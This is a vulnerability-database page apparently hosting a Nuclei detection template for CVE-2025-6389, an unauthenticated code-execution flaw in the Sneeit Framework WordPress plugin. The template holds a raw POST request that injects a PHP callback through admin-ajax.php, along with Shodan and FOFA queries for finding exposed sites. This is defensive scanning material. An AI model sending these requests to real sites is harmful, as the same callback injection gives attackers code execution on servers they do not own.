Lucene search
+L

Sneeit WP Social WordPress Plugin - Unauthenticated RCE via call_user_func

🗓️ 05 Aug 2026 02:59:55Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Unauthenticated remote code execution in Sneeit WordPress plugin via call_user_func.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2025-6389
10 Dec 202518:16
githubexploit
githubexploit
GithubExploit
Mephisto
21 May 202605:06
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2025-6389
18 Apr 202619:37
githubexploit
circl
Circl
CVE-2025-6389
25 Nov 202502:38
circl
cnnvd
CNNVD
WordPress plugin Sneeit Framework 代码注入漏洞
25 Nov 202500:00
cnnvd
cve
CVE
CVE-2025-6389
25 Nov 202502:26
cve
cvelist
Cvelist
CVE-2025-6389 Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback
25 Nov 202502:26
cvelist
euvd
EUVD
EUVD-2025-199531
25 Nov 202502:26
euvd
nvd
NVD
CVE-2025-6389
25 Nov 202503:15
nvd
patchstack
Patchstack
WordPress Sneeit Framework plugin <= 8.3 - Unauthenticated Remote Code Execution in sneeit_articles_pagination_callback vulnerability
26 Nov 202506:26
patchstack
Rows per page
id: CVE-2025-6389

info:
  name: Sneeit WP Social WordPress Plugin - Unauthenticated RCE via call_user_func
  author: DhiyaneshDk
  severity: critical
  description: |
    The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially injecting backdoors or creating new admin accounts.
  remediation: |
    Update to the latest version beyond 8.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6389
    - https://www.cve.org/CVERecord?id=CVE-2025-6389
    - https://github.com/Nxploited/CVE-2025-6389
    - https://github.com/itsismarcos/SneeitScanner-CVE-2025-6389
    - https://wpscan.com/vulnerability/CVE-2025-6389
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6389
    cwe-id: CWE-94
    epss-score: 0.73089
    epss-percentile: 0.99402
  metadata:
    verified: true
    max-request: 1
    vendor: sneeit
    product: sneeit-framework
    framework: wordpress
    fofa-query: '"sneeit_articles_pagination"'
    shodan-query: http.html:"/wp-content/plugins/wp-social/"
    publicwww-query: "/wp-content/plugins/wp-social/"
  tags: cve,cve2025,wordpress,wp-plugin,sneeit,rce,unauth,vkev,intrusive,vuln,file-upload

variables:
  marker: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=sneeit_articles_pagination&callback=var_dump&args=%5B%22{{marker}}%22%5D

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "array(1)"
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'string\(\d+\) "([^"]+)"'
        group: 1
# digest: 4b0a00483046022100a329dd447d4e134faee0c31ef337f5c13e4011310bd1eaf696f488b4be23b81a022100f0e114221c319a96271a4a623c8b1f873c7248325ed633fae9876139ffed3480:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation